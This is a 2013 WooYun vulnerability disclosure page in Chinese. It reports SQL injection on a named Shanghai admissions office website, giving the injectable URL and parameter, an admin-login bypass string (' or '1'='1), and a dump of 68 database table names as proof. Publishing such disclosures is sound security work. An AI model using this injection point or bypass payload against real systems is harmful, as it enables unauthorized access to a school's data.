当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034839

漏洞标题:某招生办网站SQL注入漏洞

相关厂商:某招生办

漏洞作者: c2c2

提交时间:2013-08-21 12:20

修复时间:2013-10-05 12:20

公开时间:2013-10-05 12:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-21: 细节已通知厂商并且等待厂商处理中
2013-08-26: 厂商已经确认,细节仅向厂商公开
2013-09-05: 细节向核心白帽子及相关领域专家公开
2013-09-15: 细节向普通白帽子公开
2013-09-25: 细节向实习白帽子公开
2013-10-05: 细节向公众公开

简要描述:

SQL注入~

详细说明:

注入点:http://www.zsb.pudong-edu.sh.cn/CenterWeb/xjgl/index.asp?SearchValue=%27&LmID=74&submit=%CB%D1%CB%F7
参数:SearchValue
PS:后台登录处也有问题,用户名' or '1'='1,密码随意即可进入

漏洞证明:

Database: zhaoshengban
[68 tables]
+------------------------+
| AboutResult |
| BForum |
| BManager |
| BReply |
| BTeam |
| BTopic |
| CWIS_FunIndex |
| CWIS_InformationMore |
| CWIS_InformationReturn |
| CWIS_LM |
| CWIS_Logs |
| CWIS_SchoolBaseInfo |
| CWIS_Style |
| CenterBigMode |
| CenterMiddleMode |
| CenterSubMode |
| Classes |
| Department |
| Educate |
| EducateType |
| FForum |
| FManager |
| FReply |
| FTeam |
| FTopic |
| FamousTeacher |
| FamousTeacherArticle |
| FileGroups |
| Files |
| GongGao |
| GradeTable |
| Grades |
| GuestBook |
| InformationClass |
| InformationMore |
| InformationReturn |
| InformationSub |
| Investigation |
| Investigation2 |
| Leader |
| LmManage |
| MessagePut |
| ModelInfo |
| News |
| NewsPicture |
| NewsType |
| Notice |
| NoticeReciever |
| Noticetype |
| NotifyReciever |
| NotifyReplay |
| Notifys |
| PageInfo |
| Party |
| PartyType |
| PermissionGroup |
| PublicList |
| PublicList_Notify_Log |
| bmlogin |
| bmtjdm |
| dj |
| dm_course_z |
| dm_session_z |
| dtproperties |
| edu |
| edutype |
| jg_js_z |
| njdm |
+------------------------+


后台:

.png


.png

修复方案:

过滤~
啥都没动 勿查水表

版权声明:转载请注明来源 c2c2@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-08-26 00:06

厂商回复:

最新状态:

暂无